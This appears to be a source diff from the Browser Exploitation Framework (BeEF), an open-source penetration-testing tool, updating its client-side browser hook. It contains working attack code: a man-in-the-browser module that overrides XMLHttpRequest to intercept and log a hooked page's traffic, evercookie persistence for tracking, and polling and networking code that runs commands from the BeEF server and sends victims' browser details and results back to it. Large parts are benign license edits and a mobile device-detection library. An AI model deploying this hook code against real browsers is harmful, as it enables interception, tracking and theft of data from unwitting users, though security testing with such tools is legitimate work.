if(ua.search(deviceS90) > -1) { return "Nokia S90"};
if(ua.search(deviceSymbian) > -1) { return "Nokia Symbian"};
if (this.isNokia()) { return 'Nokia'};
if(DetectWindowsPhone7()) { return "Windows Phone 7"};
if(DetectWindowsMobile()) { return "Windows Mobile"};
if(DetectBlackBerryTablet()) { return "BlackBerry Tablet"};
if(DetectBlackBerryWebKit()) { return "BlackBerry OS 6"};
if(DetectBlackBerryTouch()) { return "BlackBerry Touch"};
if(DetectBlackBerryHigh()) { return "BlackBerry OS 5"};
if(DetectBlackBerry()) { return "BlackBerry"};
if(DetectPalmOS()) { return "Palm OS"};
if(DetectPalmWebOS()) { return "Palm Web OS"};
if(DetectGarminNuvifone()) { return "Gamin Nuvifone"};
if(DetectArchos()) { return "Archos"}
if(DetectBrewDevice()) { return "Brew"};
if(DetectDangerHiptop()) { return "Danger Hiptop"};
if(DetectMaemoTablet()) { return "Maemo Tablet"};
if(DetectSonyMylo()) { return "Sony Mylo"};
if(DetectAmazonSilk()) { return "Kindle Fire"};
if(DetectKindle()) { return "Kindle"};
if(DetectSonyPlaystation()) { return "Playstation"};
if(ua.search(deviceNintendoDs) > -1) { return "Nintendo DS"};
if(ua.search(deviceWii) > -1) { return "Nintendo Wii"};
if(ua.search(deviceNintendo) > -1) { return "Nintendo"};
if(DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}
};
beef.regCmp('beef.net.hardware');
beef.regCmp('beef.hardware');

46
core/main/client/init.js
View File

@@ -1,24 +1,20 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// if beef.pageIsLoaded is true, then this JS has been loaded >1 times
// and will have a new session id. The new session id will need to know
// the brwoser details. So sendback the browser details again.
/**
* @literal object: beef.init
* Contains the beef_init() method which starts the BeEF client-side
* logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
*
* If beef.pageIsLoaded is true, then this JS has been loaded >1 times
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*/
BEEFHOOK = beef.session.get_hook_session_id();
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
beef.net.browser_details();
@@ -36,7 +32,7 @@ window.onpopstate = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message);
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
@@ -51,13 +47,20 @@ window.onclose = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message);
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}
}
};
/**
* Starts the polling mechanism, and initialize various components:
* - browser details (see browser.js) are sent back to the "/init" handler
* - the polling starts (checks for new commands, and execute them)
* - the logger component is initialized (see logger.js)
* - the Autorun Engine is initialized (see are.js)
*/
function beef_init() {
if (!beef.pageIsLoaded) {
beef.pageIsLoaded = true;
@@ -67,15 +70,12 @@ function beef_init() {
beef.updater.execute_commands();
beef.logger.start();
beef.are.init();
}
else {
}else {
beef.net.browser_details();
beef.updater.execute_commands();
beef.updater.check();
beef.logger.start();
beef.are.init();
}
}
}

1301
core/main/client/lib/deployJava.js Normal file
View File

File diff suppressed because it is too large Load Diff

38
core/main/client/lib/evercookie.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*
* evercookie 0.4 (10/13/2010) -- extremely persistent cookies
*
@@ -802,14 +793,19 @@ this.waitForSwf = function(i)
this.evercookie_cookie = function(name, value)
{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
try{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};
// get value from param-like string (eg, "x=y&name=VALUE")

706
core/main/client/lib/mdetect.js Normal file
View File

@@ -0,0 +1,706 @@
/* *******************************************
// Copyright 2010-2012, Anthony Hand
// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
// LICENSE INFORMATION
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
// either express or implied. See the License for the specific
// language governing permissions and limitations under the License.
// *******************************************
*/
var isIphone = false;
var isAndroidPhone = false;
var isTierTablet = false;
var isTierIphone = false;
var isTierRichCss = false;
var isTierGenericMobile = false;
var engineWebKit = "webkit";
var deviceIphone = "iphone";
var deviceIpod = "ipod";
var deviceIpad = "ipad";
var deviceMacPpc = "macintosh"; //Used for disambiguation
var deviceAndroid = "android";
var deviceGoogleTV = "googletv";
var deviceXoom = "xoom"; //Motorola Xoom
var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
var deviceSymbian = "symbian";
var deviceS60 = "series60";
var deviceS70 = "series70";
var deviceS80 = "series80";
var deviceS90 = "series90";
var deviceWinPhone7 = "windows phone os 7";
var deviceWinMob = "windows ce";
var deviceWindows = "windows";
var deviceIeMob = "iemobile";
var devicePpc = "ppc"; //Stands for PocketPC
var enginePie = "wm5 pie"; //An old Windows Mobile
var deviceBB = "blackberry";
var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
var deviceBBStorm = "blackberry95"; //Storm 1 and 2
var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
var deviceBBTour = "blackberry96"; //Tour
var deviceBBCurve = "blackberry89"; //Curve 2
var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
var deviceBBTorch = "blackberry 98"; //Torch
var deviceBBPlaybook = "playbook"; //PlayBook tablet
var devicePalm = "palm";
var deviceWebOS = "webos"; //For Palm's line of WebOS devices
var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
var engineBlazer = "blazer"; //Old Palm browser
var engineXiino = "xiino";
var deviceKindle = "kindle"; //Amazon Kindle, eInk one
var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
var vndwap = "vnd.wap";
var wml = "wml";
var deviceTablet = "tablet"; //Generic term for slate and tablet devices
var deviceBrew = "brew";
var deviceDanger = "danger";
var deviceHiptop = "hiptop";
var devicePlaystation = "playstation";
var deviceNintendoDs = "nitro";
var deviceNintendo = "nintendo";
var deviceWii = "wii";
var deviceXbox = "xbox";
var deviceArchos = "archos";
var engineOpera = "opera"; //Popular browser
var engineNetfront = "netfront"; //Common embedded OS browser
var engineUpBrowser = "up.browser"; //common on some phones
var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
var deviceMidp = "midp"; //a mobile Java technology
var uplink = "up.link";
var engineTelecaQ = 'teleca q'; //a modern feature phone browser
var devicePda = "pda";
var mini = "mini"; //Some mobile browsers put 'mini' in their names.
var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
var maemo = "maemo";
var linux = "linux";
var qtembedded = "qt embedded"; //for Sony Mylo and others
var mylocom2 = "com2"; //for Sony Mylo also
var manuSonyEricsson = "sonyericsson";
var manuericsson = "ericsson";
var manuSamsung1 = "sec-sgh";
var manuSony = "sony";
var manuHtc = "htc"; //Popular Android and WinMo manufacturer
var svcDocomo = "docomo";
var svcKddi = "kddi";
var svcVodafone = "vodafone";
var disUpdate = "update"; //pda vs. update
var uagent = "";
if (navigator && navigator.userAgent)
uagent = navigator.userAgent.toLowerCase();
function DetectIphone()
{
if (uagent.search(deviceIphone) > -1)
{
if (DetectIpad() || DetectIpod())
return false;
else
return true;
}
else
return false;
}
function DetectIpod()
{
if (uagent.search(deviceIpod) > -1)
return true;
else
return false;
}
function DetectIpad()
{
if (uagent.search(deviceIpad) > -1 && DetectWebkit())
return true;
else
return false;
}
function DetectIphoneOrIpod()
{
if (uagent.search(deviceIphone) > -1 ||
uagent.search(deviceIpod) > -1)
return true;
else
return false;
}
function DetectIos()
{
if (DetectIphoneOrIpod() || DetectIpad())
return true;
else
return false;
}
function DetectAndroid()
{
if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
return true;
if (uagent.search(deviceHtcFlyer) > -1)
return true;
else
return false;
}
function DetectAndroidPhone()
{
if (DetectAndroid() && (uagent.search(mobile) > -1))
return true;
if (DetectOperaAndroidPhone())
return true;
if (uagent.search(deviceHtcFlyer) > -1)
return true;
else
return false;
}
function DetectAndroidTablet()
{
if (!DetectAndroid())
return false;
if (DetectOperaMobile())
return false;
if (uagent.search(deviceHtcFlyer) > -1)
return false;
if (uagent.search(mobile) > -1)
return false;
else
return true;
}
function DetectAndroidWebKit()
{
if (DetectAndroid() && DetectWebkit())
return true;
else
return false;
}
function DetectGoogleTV()
{
if (uagent.search(deviceGoogleTV) > -1)
return true;
else
return false;
}
function DetectWebkit()
{
if (uagent.search(engineWebKit) > -1)
return true;
else
return false;
}
function DetectS60OssBrowser()
{
if (DetectWebkit())
{
if ((uagent.search(deviceS60) > -1 ||
uagent.search(deviceSymbian) > -1))
return true;
else
return false;
}
else
return false;
}
function DetectSymbianOS()
{
if (uagent.search(deviceSymbian) > -1 ||
uagent.search(deviceS60) > -1 ||
uagent.search(deviceS70) > -1 ||
uagent.search(deviceS80) > -1 ||
uagent.search(deviceS90) > -1)
return true;
else
return false;
}
function DetectWindowsPhone7()
{
if (uagent.search(deviceWinPhone7) > -1)
return true;
else
return false;
}
function DetectWindowsMobile()
{
if (DetectWindowsPhone7())
return false;
if (uagent.search(deviceWinMob) > -1 ||
uagent.search(deviceIeMob) > -1 ||
uagent.search(enginePie) > -1)
return true;
if ((uagent.search(devicePpc) > -1) &&
!(uagent.search(deviceMacPpc) > -1))
return true;
if (uagent.search(manuHtc) > -1 &&
uagent.search(deviceWindows) > -1)
return true;
else
return false;
}
function DetectBlackBerry()
{
if (uagent.search(deviceBB) > -1)
return true;
if (uagent.search(vndRIM) > -1)
return true;
else
return false;
}
function DetectBlackBerryTablet()
{
if (uagent.search(deviceBBPlaybook) > -1)
return true;
else
return false;
}
function DetectBlackBerryWebKit()
{
if (DetectBlackBerry() &&
uagent.search(engineWebKit) > -1)
return true;
else
return false;
}
function DetectBlackBerryTouch()
{
if (DetectBlackBerry() &&
((uagent.search(deviceBBStorm) > -1) ||
(uagent.search(deviceBBTorch) > -1) ||
(uagent.search(deviceBBBoldTouch) > -1) ||
(uagent.search(deviceBBCurveTouch) > -1) ))
return true;
else
return false;
}
function DetectBlackBerryHigh()
{
if (DetectBlackBerryWebKit())
return false;
if (DetectBlackBerry())
{
if (DetectBlackBerryTouch() ||
uagent.search(deviceBBBold) > -1 ||
uagent.search(deviceBBTour) > -1 ||
uagent.search(deviceBBCurve) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectBlackBerryLow()
{
if (DetectBlackBerry())
{
if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
return false;
else
return true;
}
else
return false;
}
function DetectPalmOS()
{
if (uagent.search(devicePalm) > -1 ||
uagent.search(engineBlazer) > -1 ||
uagent.search(engineXiino) > -1)
{
if (DetectPalmWebOS())
return false;
else
return true;
}
else
return false;
}
function DetectPalmWebOS()
{
if (uagent.search(deviceWebOS) > -1)
return true;
else
return false;
}
function DetectWebOSTablet()
{
if (uagent.search(deviceWebOShp) > -1 &&
uagent.search(deviceTablet) > -1)
return true;
else
return false;
}
function DetectGarminNuvifone()
{
if (uagent.search(deviceNuvifone) > -1)
return true;
else
return false;
}
function DetectSmartphone()
{
if (DetectIphoneOrIpod()
|| DetectAndroidPhone()
|| DetectS60OssBrowser()
|| DetectSymbianOS()
|| DetectWindowsMobile()
|| DetectWindowsPhone7()
|| DetectBlackBerry()
|| DetectPalmWebOS()
|| DetectPalmOS()
|| DetectGarminNuvifone())
return true;
return false;
};
function DetectArchos()
{
if (uagent.search(deviceArchos) > -1)
return true;
else
return false;
}
function DetectBrewDevice()
{
if (uagent.search(deviceBrew) > -1)
return true;
else
return false;
}
function DetectDangerHiptop()
{
if (uagent.search(deviceDanger) > -1 ||
uagent.search(deviceHiptop) > -1)
return true;
else
return false;
}
function DetectMaemoTablet()
{
if (uagent.search(maemo) > -1)
return true;
if ((uagent.search(linux) > -1)
&& (uagent.search(deviceTablet) > -1)
&& !DetectWebOSTablet()
&& !DetectAndroid())
return true;
else
return false;
}
function DetectSonyMylo()
{
if (uagent.search(manuSony) > -1)
{
if (uagent.search(qtembedded) > -1 ||
uagent.search(mylocom2) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectOperaMobile()
{
if (uagent.search(engineOpera) > -1)
{
if (uagent.search(mini) > -1 ||
uagent.search(mobi) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectOperaAndroidPhone()
{
if ((uagent.search(engineOpera) > -1) &&
(uagent.search(deviceAndroid) > -1) &&
(uagent.search(mobi) > -1))
return true;
else
return false;
}
function DetectOperaAndroidTablet()
{
if ((uagent.search(engineOpera) > -1) &&
(uagent.search(deviceAndroid) > -1) &&
(uagent.search(deviceTablet) > -1))
return true;
else
return false;
}
function DetectSonyPlaystation()
{
if (uagent.search(devicePlaystation) > -1)
return true;
else
return false;
};
function DetectNintendo()
{
if (uagent.search(deviceNintendo) > -1 ||
uagent.search(deviceWii) > -1 ||
uagent.search(deviceNintendoDs) > -1)
return true;
else
return false;
};
function DetectXbox()
{
if (uagent.search(deviceXbox) > -1)
return true;
else
return false;
};
function DetectGameConsole()
{
if (DetectSonyPlaystation())
return true;
if (DetectNintendo())
return true;
if (DetectXbox())
return true;
else
return false;
};
function DetectKindle()
{
if (uagent.search(deviceKindle) > -1 &&
!DetectAndroid())
return true;
else
return false;
}
function DetectAmazonSilk()
{
if (uagent.search(engineSilk) > -1)
return true;
else
return false;
}
function DetectMobileQuick()
{
if (DetectTierTablet())
return false;
if (DetectSmartphone())
return true;
if (uagent.search(deviceMidp) > -1 ||
DetectBrewDevice())
return true;
if (DetectOperaMobile())
return true;
if (uagent.search(engineNetfront) > -1)
return true;
if (uagent.search(engineUpBrowser) > -1)
return true;
if (uagent.search(engineOpenWeb) > -1)
return true;
if (DetectDangerHiptop())
return true;
if (DetectMaemoTablet())
return true;
if (DetectArchos())
return true;
if ((uagent.search(devicePda) > -1) &&
!(uagent.search(disUpdate) > -1))
return true;
if (uagent.search(mobile) > -1)
return true;
if (DetectKindle() ||
DetectAmazonSilk())
return true;
return false;
};
function DetectMobileLong()
{
if (DetectMobileQuick())
return true;
if (DetectGameConsole())
return true;
if (DetectSonyMylo())
return true;
if (uagent.search(manuSamsung1) > -1 ||
uagent.search(manuSonyEricsson) > -1 ||
uagent.search(manuericsson) > -1)
return true;
if (uagent.search(svcDocomo) > -1)
return true;
if (uagent.search(svcKddi) > -1)
return true;
if (uagent.search(svcVodafone) > -1)
return true;
return false;
};
function DetectTierTablet()
{
if (DetectIpad()
|| DetectAndroidTablet()
|| DetectBlackBerryTablet()
|| DetectWebOSTablet())
return true;
else
return false;
};
function DetectTierIphone()
{
if (DetectIphoneOrIpod())
return true;
if (DetectAndroidPhone())
return true;
if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
return true;
if (DetectWindowsPhone7())
return true;
if (DetectPalmWebOS())
return true;
if (DetectGarminNuvifone())
return true;
else
return false;
};
function DetectTierRichCss()
{
if (DetectMobileQuick())
{
if (DetectTierIphone() || DetectKindle())
return false;
if (DetectWebkit())
return true;
if (DetectS60OssBrowser())
return true;
if (DetectBlackBerryHigh())
return true;
if (DetectWindowsMobile())
return true;
if (uagent.search(engineTelecaQ) > -1)
return true;
else
return false;
}
else
return false;
};
function DetectTierOtherPhones()
{
if (DetectMobileLong())
{
if (DetectTierIphone() || DetectTierRichCss())
return false;
else
return true;
}
else
return false;
};
function InitDeviceScan()
{
isIphone = DetectIphoneOrIpod();
isAndroidPhone = DetectAndroidPhone();
isTierIphone = DetectTierIphone();
isTierTablet = DetectTierTablet();
isTierRichCss = DetectTierRichCss();
isTierGenericMobile = DetectTierOtherPhones();
};
InitDeviceScan()

18
core/main/client/logger.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.logger
*
@@ -59,6 +50,7 @@ beef.logger = {
*/
start: function() {
beef.browser.hookChildFrames();
this.running = true;
var d = new Date();
this.time = d.getTime();

92
core/main/client/mitb.js
View File

@@ -1,19 +1,10 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.mitb = {
cid:null,
@@ -23,47 +14,30 @@ beef.mitb = {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
var hook_file = "<%= @hook_file %>";
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
// Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
// or a request initiated by the MiTB itself.
if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
open.call(this, method, url, async, true);
}else {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
var requestPort;
if (portR != null) { requestPort = portR[0].split(":")[1]; }
//GET request
if (method == "GET") {
//GET request -> cross-domain
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
}else { //GET request -> same-domain
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
@@ -72,26 +46,19 @@ beef.mitb = {
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
// write the url of the page
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}else{
//POST request
beef.mitb.sniff("POST ajax request to: " + url);
open.call(this, method, url, async, true);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
@@ -170,7 +137,7 @@ beef.mitb = {
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.open('POST', url, false, true);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
@@ -190,14 +157,13 @@ beef.mitb = {
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
@@ -213,7 +179,7 @@ beef.mitb = {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
@@ -232,11 +198,9 @@ beef.mitb = {
beef.mitb.sniff("GET: " + url);
} catch (x) {
// the link is cross-domain, so load the resource in a different tab
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},

124
core/main/client/net.js
View File

@@ -1,22 +1,20 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net
*
* Provides basic networking functions.
* Provides basic networking functions,
* like beef.net.request and beef.net.forgeRequest,
* used by BeEF command modules and the Requester extension,
* as well as beef.net.send which is used to return commands
* to BeEF server-side components.
*
* Also, it contains the core methods used by the XHR-polling
* mechanism (flush, queue)
*/
beef.net = {
@@ -30,7 +28,10 @@ beef.net = {
sid_count:0,
cmd_queue:[],
//Command object
/**
* Command object. This represents the data to be sent back to BeEF,
* using the beef.net.send() method.
*/
command:function () {
this.cid = null;
this.results = null;
@@ -38,13 +39,17 @@ beef.net = {
this.callback = null;
},
//Packet object
/**
* Packet object. A single chunk of data. X packets -> 1 stream
*/
packet:function () {
this.id = null;
this.data = null;
},
//Stream object
/**
* Stream object. Contains X packets, which are command result chunks.
*/
stream:function () {
this.id = null;
this.packets = [];
@@ -60,7 +65,8 @@ beef.net = {
/**
* Response Object - used in the beef.net.request callback
* Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
* NOTE: as we are using async mode, the response object will be empty if returned.
* Using sync mode, request obj fields will be populated.
*/
response:function () {
this.status_code = null; // 500, 404, 200, 302
@@ -73,7 +79,13 @@ beef.net = {
this.headers = null; // full response headers
},
//Queues the command, to be sent back to the framework on the next refresh
/**
* Queues the specified command results.
* @param: {String} handler: the server-side handler that will be called
* @param: {Integer} cid: command id
* @param: {String} results: the data to send
* @param: {Function} callback: the function to call after execution
*/
queue:function (handler, cid, results, callback) {
if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
var s = new beef.net.command();
@@ -85,26 +97,40 @@ beef.net = {
}
},
//Queues the current command and flushes the queue straight away
/**
* Queues the current command results and flushes the queue straight away.
* NOTE: Always send Browser Fingerprinting results
* (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
* even if WebSockets are enabled.
* @param: {String} handler: the server-side handler that will be called
* @param: {Integer} cid: command id
* @param: {String} results: the data to send
* @param: {Function} callback: the function to call after execution
*/
send:function (handler, cid, results, callback) {
if (typeof beef.websocket === "undefined") {
if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
this.queue(handler, cid, results, callback);
this.flush();
}
else {
}else {
try {
beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
'", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
}
catch (e) {
}catch (e) {
this.queue(handler, cid, results, callback);
this.flush();
}
}
}
},
//Flush all currently queued commands to the framework
/**
* Flush all currently queued command results to the framework,
* chopping the data in chunks ('chunk' method) which will be re-assembled
* server-side by the network stack.
* NOTE: currently 'flush' is used only with the default
* XHR-polling mechanism. If WebSockets are used, the data is sent
* back to BeEF straight away.
*/
flush:function () {
if (this.cmd_queue.length > 0) {
var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
@@ -128,13 +154,21 @@ beef.net = {
}
},
//Split string into chunk lengths determined by amount
/**
* Split the input data into chunk lengths determined by the amount parameter.
* @param: {String} str: the input data
* @param: {Integer} amount: chunk length
*/
chunk:function (str, amount) {
if (typeof amount == 'undefined') n = 2;
return str.match(RegExp('.{1,' + amount + '}', 'g'));
},
//Push packets to framework
/**
* Push the input stream back to the BeEF server-side components.
* It uses beef.net.request to send back the data.
* @param: {Object} stream: the stream object to be sent back.
*/
push:function (stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++) {
@@ -143,7 +177,7 @@ beef.net = {
},
/**
*Performs http requests
* Performs http requests
* @param: {String} scheme: HTTP or HTTPS
* @param: {String} method: GET or POST
* @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -202,13 +236,12 @@ beef.net = {
data:data,
timeout:(timeout * 1000),
//needed otherwise jQuery always add Content-type: application/xml, even if data is populated
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend:function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
success:function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
@@ -249,9 +282,11 @@ beef.net = {
},
/*
* Similar to this.request, except from a few things that are needed when dealing with forged requests:
* Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
* - requestid: needed on the callback
* - allowCrossDomain: set cross-domain requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
*/
forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
@@ -294,14 +329,21 @@ beef.net = {
return response;
}
// build and execute the request
if (method == "POST") {
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
$j.ajaxSetup({
data:data
dataType: dataType
});
} else {
$j.ajaxSetup({
dataType: 'script'
});
}
// this is required for bugs in IE so data can be transfered back to the server
// this is required for bugs in IE so data can be transferred back to the server
if ( beef.browser.isIE() ) {
dataType = 'script'
}
@@ -312,9 +354,7 @@ beef.net = {
headers: headers,
timeout: (timeout * 1000),
// needed otherwise jQuery always adds:
// Content-type: application/xml
// even if data is populated
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend:function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
@@ -416,7 +456,9 @@ beef.net = {
return false;
},
//Sends back browser details to framework
/**
* Sends back browser details to framework, calling beef.browser.getDetails()
*/
browser_details:function () {
var details = beef.browser.getDetails();
details['HookSessionID'] = beef.session.get_hook_session_id();

77
core/main/client/net/cors.js Normal file
View File

@@ -0,0 +1,77 @@
beef.net.cors = {
handler: "cors",
/**
* Response Object - used in the beef.net.request callback
*/
response:function () {
this.status = null; // 500, 404, 200, 302, etc
this.headers = null; // full response headers
this.body = null; // full response body
},
/**
* Make a cross-domain request using CORS
*
* @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
* @param url {String} url
* @param data {String} request body
* @param callback {Function} function to callback on completion
*/
request: function(method, url, data, callback) {
var xhr;
var response = new this.response;
if (XMLHttpRequest) {
xhr = new XMLHttpRequest();
if ('withCredentials' in xhr) {
